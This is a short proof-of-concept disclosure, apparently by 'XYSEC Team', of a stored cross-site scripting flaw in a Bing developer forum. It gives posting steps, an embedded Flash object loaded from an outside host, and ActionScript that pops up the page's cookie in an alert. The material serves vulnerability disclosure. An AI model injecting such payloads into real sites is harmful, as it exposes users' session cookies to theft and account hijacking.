Proof of Concept - Bing:
=================
The vulnerability can be exploited by remote attackers with low required user inter action. For demonstration or reproduce ...

1) Either comment or start a new thread (http://www.bing.com/community/developer/f/13214/p/addpost.aspx).
2) Click on the html button, through which you can enter html source directly "HTML Source editor"
3) Paste the exploit code:


       <object type="application/x-shockwave-flash" data="http://www.subhohalder.com/xysecteam.swf" width="300" height="300">
           <param name="movie" value="http://www.subhohalder.com/xysecteam.swf" />
                 <param name="quality" value="high" />
                 <param name="scale" value="noscale" />
                 <param name="salign" value="LT" />
       <param name="allowScriptAccess" value="always" />
                 <param name="menu" value="false" />
            </object>


4) Click on update, and the document.cookie pop ups in alert

the vulnerable SWF is compiled from an ActionScript with the following code:


       class Main {

       static function main() {

       getURL('javascript:alert("XYSEC Team "+document.cookie)');

       }    }